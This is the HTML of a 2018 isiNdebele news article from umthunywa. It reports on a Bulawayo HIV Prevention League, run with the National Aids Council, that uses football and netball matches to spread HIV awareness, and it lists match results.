<!doctype html >
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="no-js ie9 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
    <title>I-NAC INGENA KUNGUQU . . . Kulwiswa ingculazi ngebhola | umthunywa</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="author" content="Umthunywa Online">
    <link rel="pingback" href="http://www.umthunywa.co.zw/xmlrpc.php" />

    <meta property="og:image" content="http://www.umthunywa.co.zw/wp-content/uploads/2018/02/pG-15-hiv-league-2.jpg" /><link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="umthunywa &raquo; Feed" href="http://www.umthunywa.co.zw/feed/" />
<link rel="alternate" type="application/rss+xml" title="umthunywa &raquo; Comments Feed" href="http://www.umthunywa.co.zw/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="umthunywa &raquo; I-NAC INGENA KUNGUQU . . . Kulwiswa ingculazi ngebhola Comments Feed" href="http://www.umthunywa.co.zw/i-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.umthunywa.co.zw\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.3"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://www.umthunywa.co.zw/wp-content/plugins/revslider/rs-plugin/css/settings.css?ver=4.6.5' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='google-font-opensans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-ubuntu-css'  href='http://fonts.googleapis.com/css?family=Ubuntu%3A300%2C400%2C500%2C700%2C300italic%2C400italic%2C500italic%2C700italic&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Clatin-ext%2Ccyrillic&#038;ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-pt-sans-css'  href='http://fonts.googleapis.com/css?family=PT+Sans%3A400%2C700%2C400italic&#038;subset=latin%2Ccyrillic-ext%2Clatin-ext%2Ccyrillic&#038;ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-oswald-css'  href='http://fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700&#038;subset=latin%2Clatin-ext&#038;ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='google-roboto-cond-css'  href='http://fonts.googleapis.com/css?family=Roboto+Condensed%3A300italic%2C400italic%2C700italic%2C400%2C300%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='google-vollkorn-css'  href='http://fonts.googleapis.com/css?family=Vollkorn%3A400italic%2C700italic%2C400%2C700&#038;ver=4.9.3' type='text/css' media='all' />
<link rel='stylesheet' id='td-bootstrap-css'  href='http://www.umthunywa.co.zw/wp-content/themes/Newspaper/includes/wp_booster/external/bootstrap/td-bootstrap.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://www.umthunywa.co.zw/wp-content/themes/Newspaper/style.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_custom_css-css'  href='http://www.umthunywa.co.zw/wp-content/uploads/js_composer/custom.css?ver=4.3.5' type='text/css' media='screen' />
<script type='text/javascript' src='http://www.umthunywa.co.zw/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.umthunywa.co.zw/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://www.umthunywa.co.zw/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?ver=4.6.5'></script>
<script type='text/javascript' src='http://www.umthunywa.co.zw/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.6.5'></script>
<link rel='https://api.w.org/' href='http://www.umthunywa.co.zw/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.umthunywa.co.zw/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.umthunywa.co.zw/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.3" />
<link rel="canonical" href="http://www.umthunywa.co.zw/i-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola/" />
<link rel='shortlink' href='http://www.umthunywa.co.zw/?p=17199' />
<link rel="alternate" type="application/json+oembed" href="http://www.umthunywa.co.zw/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.umthunywa.co.zw%2Fi-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.umthunywa.co.zw/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.umthunywa.co.zw%2Fi-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola%2F&#038;format=xml" />

<!-- This site is using AdRotate v3.9.11 to display their advertisements - http://www.adrotateplugin.com/ -->
<!-- AdRotate JS -->
<script type="text/javascript">
var tracker_url = 'http://www.umthunywa.co.zw/wp-content/plugins/adrotate/library/clicktracker.php';
jQuery(document).ready(function(){
	jQuery('.g-1').gslider({ groupid: 1, speed: 10000 });
});
</script>
<!-- /AdRotate JS -->

<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { padding:0; position:aboslute; overflow:hidden; }
	.b { padding:0; margin:0; overflow:hidden; clear:none; }
	.a { clear:none; float:left; }
	.g-1 { width:728px; height:90px; margin:1px; }
	.a-1 { width:728px; height:90px; }
	.clear, .block_both { clear:both; }
	.clear_l, .block_left { clear:left; }
	.clear_r, .block_right { clear:right; }
</style>
<!-- /AdRotate CSS -->

		<script type="text/javascript">
			jQuery(document).ready(function() {
				// CUSTOM AJAX CONTENT LOADING FUNCTION
				var ajaxRevslider = function(obj) {
				
					// obj.type : Post Type
					// obj.id : ID of Content to Load
					// obj.aspectratio : The Aspect Ratio of the Container / Media
					// obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content
					
					var content = "";

					data = {};
					
					data.action = 'revslider_ajax_call_front';
					data.client_action = 'get_slider_html';
					data.token = '712454a309';
					data.type = obj.type;
					data.id = obj.id;
					data.aspectratio = obj.aspectratio;
					
					// SYNC AJAX REQUEST
					jQuery.ajax({
						type:"post",
						url:"http://www.umthunywa.co.zw/wp-admin/admin-ajax.php",
						dataType: 'json',
						data:data,
						async:false,
						success: function(ret, textStatus, XMLHttpRequest) {
							if(ret.success == true)
								content = ret.data;								
						},
						error: function(e) {
							console.log(e);
						}
					});
					
					 // FIRST RETURN THE CONTENT WHEN IT IS LOADED !!
					 return content;						 
				};
				
				// CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER
				var ajaxRemoveRevslider = function(obj) {
					return jQuery(obj.selector+" .rev_slider").revkill();
				};

				// EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION
				var extendessential = setInterval(function() {
					if (jQuery.fn.tpessential != undefined) {
						clearInterval(extendessential);
						if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') {
							jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3});   
							// type:  Name of the Post to load via Ajax into the Essential Grid Ajax Container
							// func: the Function Name which is Called once the Item with the Post Type has been clicked
							// killfunc: function to kill in case the Ajax Window going to be removed (before Remove function !
							// openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3)
						}
					}
				},30);
			});
		</script>
		<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//www.umthunywa.co.zw/?wordfence_lh=1&hid=D1B9D1B1A63ABA161A765F193411C5C8');
</script><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if IE 8]><link rel="stylesheet" type="text/css" href="http://www.umthunywa.co.zw/wp-content/plugins/js_composer/assets/css/vc-ie8.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var td_blocks = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function td_block() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_cur_cat = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.is_ajax_running = false;
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
var td_ad_background_click_link="";
var td_ad_background_click_target="";
var td_ajax_url="http://www.umthunywa.co.zw/wp-admin/admin-ajax.php";
var td_get_template_directory_uri="http://www.umthunywa.co.zw/wp-content/themes/Newspaper";
var tds_snap_menu="";
var tds_header_style="";
var tds_mobile_swipe="";
var td_search_url="http://www.umthunywa.co.zw/search/";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top="0";
var tds_theme_color_site_wide="#4db2ec";
</script>

</head>

<body class="post-template-default single single-post postid-17199 single-format-standard td-full-layout i-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola wpb-js-composer js-comp-ver-4.3.5 vc_responsive">



<div id="outer-wrap">
    <div id="td-mobile-nav" class="td-transition-content-and-menu">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">CLOSE</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-main-menu-container"><ul id="menu-main-menu" class=""><li id="menu-item-23" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-23"><a href="http://www.umthunywa.co.zw/">Ekhaya</a></li>
<li id="menu-item-20" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20"><a href="http://www.umthunywa.co.zw/category/ezakuleli/">Ezakuleli</a></li>
<li id="menu-item-24" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-24"><a href="http://www.umthunywa.co.zw/category/ezabalimi-farming/">Ezabalimi</a></li>
<li id="menu-item-25" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-25"><a href="http://www.umthunywa.co.zw/category/ezamasiko-cultural-articles/">Ezamasiko</a></li>
<li id="menu-item-26" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-26"><a href="http://www.umthunywa.co.zw/category/ezemfundo-education/">Ezemfundo</a></li>
<li id="menu-item-27" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-27"><a href="http://www.umthunywa.co.zw/category/ezemidlalo/">Ezemidlalo</a></li>
<li id="menu-item-28" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28"><a href="http://www.umthunywa.co.zw/category/ezempilakahle-health-news/">Ezempilakahle</a></li>
<li id="menu-item-29" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-29"><a href="http://www.umthunywa.co.zw/category/ezokuzithokozisa/">Ezokuzithokozisa</a></li>
<li id="menu-item-30" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-30"><a href="http://www.umthunywa.co.zw/category/indimi-other-indigenous-languages/">Indimi</a></li>
</ul></div>    </div>
</div>    <div id="inner-wrap" class="td-transition-content-and-menu">
<div class="td-header-menu-wrap">
    <div class="container">
        <div class="row">
            <div class="span9">
                                <div class="menu-top-container"><ul id="menu-main-menu-1" class="top-header-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-23"><a href="http://www.umthunywa.co.zw/">Ekhaya</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-20"><a href="http://www.umthunywa.co.zw/category/ezakuleli/">Ezakuleli</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-24"><a href="http://www.umthunywa.co.zw/category/ezabalimi-farming/">Ezabalimi</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-25"><a href="http://www.umthunywa.co.zw/category/ezamasiko-cultural-articles/">Ezamasiko</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-26"><a href="http://www.umthunywa.co.zw/category/ezemfundo-education/">Ezemfundo</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-27"><a href="http://www.umthunywa.co.zw/category/ezemidlalo/">Ezemidlalo</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-28"><a href="http://www.umthunywa.co.zw/category/ezempilakahle-health-news/">Ezempilakahle</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-29"><a href="http://www.umthunywa.co.zw/category/ezokuzithokozisa/">Ezokuzithokozisa</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-30"><a href="http://www.umthunywa.co.zw/category/indimi-other-indigenous-languages/">Indimi</a></li>
</ul></div>            </div>

            <div class="span3">
                            </div>

        </div>
    </div>
</div>



<!-- graphic logo and ad -->
<div class="td-header-bg">
    <div class="container td-logo-rec-wrap">
        <div class="row">
            <div class="span4 header-logo-wrap" role="banner" itemscope="itemscope" itemtype="http://schema.org/Organization">
                                        <a itemprop="url" href="http://www.umthunywa.co.zw"><img width="300" src="http://www.umthunywa.co.zw/wp-content/uploads/2015/02/logo-300x70.png" alt=""/></a>
                        <meta itemprop="name" content="umthunywa">
                                    </div>
            <div class="span8 td-header-style-1">
                
				<div class="g g-1"><div class="a-1 c-1"><a data-track="NSwxLDAsMQ==" class="gofollow" href="http://www.ajdg.net"><img src="http://www.umthunywa.co.zw/wp-content/uploads/2018/02/13632-CBZ-E.B-Its-up-to-you-to-cover-your-back-UMTHUNYWA-300x100pxl-0....jpg" /></a></div><div class="a-1 c-2"><a data-track="NCwxLDAsMQ==" class="gofollow" href="http://www.ajdg.net"><img src="http://www.umthunywa.co.zw/wp-content/uploads/2018/01/FSG-Online-B.png" /></a></div><div class="a-1 c-3"><a data-track="MywxLDAsMQ==" class="gofollow" href="http://www.ajdg.net"><img src="http://www.umthunywa.co.zw/wp-content/uploads/2018/01/FSG-Online-A.png" /></a></div></div><div class="clear"></div>            </div>
        </div>
    </div>
</div>
<!-- header menu -->

<div class="td-menu-placeholder">

    <div class="td-menu-background">
        <div class="container td-menu-wrap">



            <div class="row-fluid td-menu-header">

                <div class="span11">
                                            <div class="mobile-logo-wrap">
                                                                    <a itemprop="url" href="http://www.umthunywa.co.zw"><img width="300"  src="http://www.umthunywa.co.zw/wp-content/uploads/2015/02/logo-300x70.png" alt=""/></a>
                                        <meta itemprop="name" content="umthunywa">
                                                            </div>
                    

                    <div id="td-top-mobile-toggle">
                        <ul class="sf-menu">
                            <li>
                                <a href="#">
                                    <span class="menu_icon td-sp td-sp-ico-menu"></span>
                                </a>
                            </li>
                        </ul>
                    </div>

                    <div id="td-top-menu" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">

                            <div class="menu-main-menu-container"><ul id="menu-main-menu-2" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-23"><a href="http://www.umthunywa.co.zw/">Ekhaya</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-20"><a href="http://www.umthunywa.co.zw/category/ezakuleli/">Ezakuleli</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-24"><a href="http://www.umthunywa.co.zw/category/ezabalimi-farming/">Ezabalimi</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-25"><a href="http://www.umthunywa.co.zw/category/ezamasiko-cultural-articles/">Ezamasiko</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-26"><a href="http://www.umthunywa.co.zw/category/ezemfundo-education/">Ezemfundo</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-27"><a href="http://www.umthunywa.co.zw/category/ezemidlalo/">Ezemidlalo</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-28"><a href="http://www.umthunywa.co.zw/category/ezempilakahle-health-news/">Ezempilakahle</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-29"><a href="http://www.umthunywa.co.zw/category/ezokuzithokozisa/">Ezokuzithokozisa</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-30"><a href="http://www.umthunywa.co.zw/category/indimi-other-indigenous-languages/">Indimi</a></li>
</ul></div>                    </div>



                </div>

                <div class="span1" id="td-top-search">
                    <!-- Search -->
                    <div class="header-search-wrap">
                        <div class="dropdown header-search">
                            <a id="search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><span class="td-sp td-sp-ico-search"></span></a>
                            <div class="dropdown-menu" aria-labelledby="search-button">
                                <form role="search" method="get" class="td-search-form" action="http://www.umthunywa.co.zw/">
                                    <div class="td-head-form-search-wrap">
                                        <input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
                                    </div>
                                </form>
                                <div id="td-aj-search"></div>
                            </div>
                        </div>
                    </div>
                </div>


            </div> <!-- /.row-fluid -->
        </div> <!-- /.td-menu-wrap -->
    </div> <!-- /.td-menu-background -->
</div> <!-- /.td-menu-placeholder -->
        <div class="container td-page-wrap">
            <div class="row">
                <div class="span12">
                    <div class="td-grid-wrap">
                        <div class="container-fluid">
                            <div class="row-fluid ">
                        <div class="span8 column_container td-post-content" role="main" itemprop="mainContentOfPage">
                    <div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="http://www.umthunywa.co.zw"><span itemprop="title">Home</span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in Ezemidlalo" class="entry-crumb" itemprop="url" href="http://www.umthunywa.co.zw/category/ezemidlalo/"><span itemprop="title">Ezemidlalo</span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "I-NAC INGENA KUNGUQU . . . Kulwiswa ingculazi ngebhola">I-NAC INGENA KUNGUQU . . . Kulwiswa ingculazi ngebhola</span></div>
        <article id="post-17199" class="post-17199 post type-post status-publish format-standard has-post-thumbnail hentry category-ezemidlalo" itemscope itemtype="http://schema.org/Article">

        <header>

            <h1 itemprop="name" class="entry-title">I-NAC INGENA KUNGUQU . . . Kulwiswa ingculazi ngebhola</h1>
            <div class="meta-info">
                <ul class="td-category"><li class="entry-category"><a  href="http://www.umthunywa.co.zw/category/ezemidlalo/">Ezemidlalo</a></li></ul>                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-03-01T00:02:55+00:00" >Mar 1, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>                <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://www.umthunywa.co.zw/i-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-17199">20</span></div>            </div>
        </header>


        

        <div class="td-post-featured-image"><figure><a href="http://www.umthunywa.co.zw/wp-content/uploads/2018/02/pG-15-hiv-league-2.jpg" data-caption="Izisebenzi zeNational Aids Council lamanye amalunga amathimu ngesikhathi kunikezwa impahla yokudlala kunkezo yeHIV Prevention League"><img width="640" height="424" itemprop="image" class="entry-thumb td-modal-image" src="http://www.umthunywa.co.zw/wp-content/uploads/2018/02/pG-15-hiv-league-2.jpg" alt="" title="pG 15- hiv league 2"/></a><figcaption class="wp-caption-text">Izisebenzi zeNational Aids Council lamanye amalunga amathimu ngesikhathi kunikezwa impahla yokudlala kunkezo yeHIV Prevention League</figcaption></figure></div>
        <div class="td-post-text-content">
            <p style="text-align: left;"><strong>YiNtatheli kaMthunywa</strong></p>
<p>UMDLALO kanobutshuzwayo usubonakala njengomdlalo olakho ukusetshenziswa kumkhankaso wokulwisana lomkhuhlane wengculazi kuleli.<span id="more-17199"></span></p>
<p style="text-align: left;">Ngaphandle kwenguqu, kulomdlalo wokuqaga njalo.</p>
<p style="text-align: left;">Ngenxa yokuba labalandeli abanengi, inguqu ngumdlalo onikeza izisebenzi zempilakahle ithuba lokuthi zitshele abantu nge-HIV leAids njalo umbiko wabo ufinyelele abantu abathe xaxa.</p>
<p style="text-align: left;">Ngomnyaka odluleyo idolobho lakoBulawayo libengelakuqala ukuthi liqoqe iligi ehlanganisa amaqembu enguqu ancintisa ngaphansi kwe-HIV Prevention League.</p>
<p style="text-align: left;">Iligi le iqhutshwa yinhlanganiso yeNational Aids Council incediswa yiYouth Creative Ideas.</p>
<p style="text-align: left;">Kuliviki iphephandaba likazulu lithole umbiko evela kunhlanganiso le eveza ukuba imidlalo yalonyaka isiqalile.</p>
<p style="text-align: left;">Iligi le edlalelwa ngamaqembu alitshumi lasitshiya galombili ivule amasango ka-2018 ngoMgqibelo odluleyo enkundleni yeSilwane elokitshini lePumula.</p>
<p style="text-align: left;">Isikhulumi seligi le uMthokozisi Ndlovu uthe inhloso yokubumba umncintiswano webhola yikuncedisa umphakathi ukwenqabela igcikwane leHIV, ukufundisa intsha ngokuziphatha kuhle kwezocansi, ukugeza umzimba kanye lokukhuthaza izakhamizi ukuthi ziqinele ukufundisana ngezempilakahle.</p>
<p style="text-align: left;">“Iligi yethu yeHIV Prevention isiqalisile. Silamaqembu alitshumi lasitshiya galombili kunguqu. Injongo yethu igxile ekukhuthazeni uzulu ngokwenqabela iHIV lokwelatshwa kwayo. Sisebenzisa umdlalo wenguqu lowokuqaga lezinye indlela zokuthokozisa abantu,” kutsho uNdlovu, ophinda abengumongameli weligi le.</p>
<p style="text-align: left;">“Konke lokhu sikwenza lenhlanganiso yeNational Aids Council koBulawayo.</p>
<p style="text-align: left;">“Ngokusebenzisa ezemidlalo senelisa ukukhankasa kubadlali ngokuqakatheka kokuvikela abantwana kugcikwane le-HIV ngokufundisa omama lamantombazana ngohlelo lwe-PMTCT, ukusokwa, ukuvikela lokwelatshwa kwemikhuhlane yocansi.”</p>
<p style="text-align: left;">Impumela yemidlalo:</p>
<p style="text-align: left;">Makokoba Shooters 2 – 3 Emakhandeni Pirates, Magwegwe FC Chelsea 3 – 0 Pumula High point, Nkulumane United Refineries 6 – 2 Entumbane Eleven Stars, Nketa Seven Warriors 5 – 5 Emakhandeni Bosso Chapter, Emakhandeni United 5 – 3 Byo S&#8212;&#8212;&#8212;-outh Busy bee, Makokoba Renkini rovers 2 – 2 Byo North Vulture, Montrose HP legends 2 – 2 Iminyela Mayellow, Byo South Zwakala Zulu 3 – 2 Makokoba Raiders.</p>
<p style="text-align: left;">Netball: Busters Mpopoma 40 – 27 Luveve Queens, Mthala Mpophoma 30 – 24 Flying Eagles Luveve.<br />
Lethal Angels Magwegwe 58 – 2 Mgoqo, Nkulumane Glenkara Nkulumane 22 -37 How Mine Metallion Gold.</p>
        </div>


        <div class="clearfix"></div>

        <footer>
                                                
            <div class="td-social-sharing">
                
                <div class="td-tags-and-social-wrapper-box td-tags-and-social-wrapper-box-bottom-line">
                    <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=I-NAC+INGENA+KUNGUQU+.+.+.+Kulwiswa+ingculazi+ngebhola&url=http%3A%2F%2Fwww.umthunywa.co.zw%2Fi-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola%2F&via=umthunywa" onclick="if(!document.getElementById('td_social_networks_buttons')){window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;}" ><div class="td-sp td-sp-share-twitter"></div><div class="td-social-but-text">Twitter</div></a>
                    <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.umthunywa.co.zw%2Fi-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-facebook"></div><div class="td-social-but-text">Facebook</div></a>
                    <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.umthunywa.co.zw/i-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-google"></div><div class="td-social-but-text">Google +</div></a>
